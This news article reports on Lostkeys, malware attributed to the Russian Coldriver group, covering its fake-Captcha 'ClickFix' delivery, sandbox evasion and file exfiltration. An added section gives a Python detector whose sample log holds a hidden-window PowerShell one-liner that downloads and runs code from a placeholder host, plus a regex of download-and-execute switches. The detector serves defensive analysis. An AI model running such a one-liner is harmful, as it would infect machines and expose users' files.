Malware Targets Western Officials, NGOs and Journalists

Russian cyber espionage hackers are using a new malware strain dubbed “Lostkeys” in a targeted espionage campaign aimed at Western officials, NGOs and journalists.
Google researchers attribute Lostkeys to the threat group Coldriver, also tracked as UNC4057, Star Blizzard and Callisto. The group is an operational unit within the Federal Security Service, the Russian successor to the KGB, and is known for credential phishing attacks. Lostkeys is evidence that the group has improved its capabilities with a multi-stage infection chain designed to steal documents and harvest sensitive data.
Members of the threat group have been indicted in the U.S. and sanctioned in Europe, Britain and the U.S. A December 2023 advisory published by the English-speaking countries that make up the Five Eyes intelligence alliance warned that the group remains active (see: UK and US Accuse Russian FSB of ‘Hack and Leak’ Operation).
Lostkeys marks a new tool in Coldriver’s arsenal, representing an evolution from credential theft to full system infiltration, the Google Threat Intelligence Group said. The group uses the malware selectively, deploying it only against high-value targets, the report said.
Google observed Lostkeys activity in January, March and April, with indicators suggesting the malware may have first appeared as early as December 2023. Coldriver’s typical targets include former and current Western government advisors, think tanks, NGOs, journalists and individuals with ties to Ukraine.
The Lostkeys attack chain begins with a fake Captcha page that tricks victims into pasting malicious PowerShell code into their Windows Run prompt, a technique dubbed “ClickFix” (see: ClickFix Attacks Increasingly Lead to Infostealer Infections).
This social engineering method circumvents traditional security controls and relies heavily on user compliance. Once executed, the PowerShell script pulls in successive payloads, each retrieved from the same command-and-control server but using a unique identifier per victim.
The malware shows signs of sandbox evasion: before advancing to the final stage, the second-stage code hashes the device’s display resolution and halts execution if the hash matches a known virtual machine setup.
The final payload is a Visual Basic Script file that exfiltrates files with specific extensions from targeted directories, gathers system information and a list of running processes, and sends them back to the attacker. The script is decoded using a two-key substitution cipher, with each key pair unique to every infection chain.
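The ClickFix step that opens the chain described above has a recognisable shape in endpoint telemetry: the Windows Run prompt is hosted by explorer.exe, so a pasted one-liner shows up as explorer.exe spawning PowerShell with download or hidden-window switches. The following detection logic is an added example, not code from the article or from Google's report; the Sysmon-style JSON events, the hostname, user names and URL are constructed placeholders, and the switch list is an assumption about common one-liner shapes rather than anything the article states.

```python
"""Flag process-creation events that look like a ClickFix-style launch
(constructed example; field names follow Sysmon Event ID 1 conventions)."""
import json
import re

# Switches commonly seen in pasted one-liners. Assumed list, not from the article.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b|-nop\b|-noprofile\b|"
    r"\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|"
    r"net\.webclient|\|\s*iex\b|invoke-expression)",
    re.IGNORECASE,
)

def is_clickfix_candidate(event: dict) -> bool:
    """True when the Run prompt host (explorer.exe) spawns PowerShell with
    download/evasion switches. Other parents (cmd.exe, a terminal, an RMM
    agent) are ignored so routine administrator activity stays out."""
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    if parent != "explorer.exe" or image not in ("powershell.exe", "pwsh.exe"):
        return False
    return bool(SUSPICIOUS_ARGS.search(event.get("CommandLine", "")))

def scan(lines):
    """Return (line_number, user, command_line) for each suspicious JSON event;
    lines that are not valid JSON are skipped rather than aborting the scan."""
    hits = []
    for n, line in enumerate(lines, 1):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if is_clickfix_candidate(ev):
            hits.append((n, ev.get("User", "?"), ev.get("CommandLine", "")))
    return hits

# Constructed sample events: one pasted-into-Run launch, one admin script, one benign.
SAMPLE_LOG = [
    '{"EventID":1,"Image":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","ParentImage":"C:\\\\Windows\\\\explorer.exe","User":"CORP\\\\analyst","CommandLine":"powershell -w hidden -c \\"irm https://captcha.example/verify | iex\\""}',
    '{"EventID":1,"Image":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","ParentImage":"C:\\\\Windows\\\\System32\\\\cmd.exe","User":"CORP\\\\admin","CommandLine":"powershell -File deploy.ps1"}',
    '{"EventID":1,"Image":"C:\\\\Windows\\\\System32\\\\notepad.exe","ParentImage":"C:\\\\Windows\\\\explorer.exe","User":"CORP\\\\analyst","CommandLine":"notepad.exe"}',
]

if __name__ == "__main__":
    for n, user, cmd in scan(SAMPLE_LOG):
        print(f"line {n}: {user}: {cmd}")
```

The same parent/child shape also covers pastes into a File Explorer address bar, which is likewise hosted by explorer.exe.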
Lostkeys is reminiscent of Spica, a previous malware strain used by Coldriver in 2024. While Spica was also designed for data theft, Lostkeys shows a refined architecture and more advanced delivery mechanisms.
Although some Lostkeys samples dating back to December 2023 mimicked the Maltego software package and used Portable Executable files instead of PowerShell, Google could not confirm whether those early versions were part of the same operation or repurposed malware used by another group.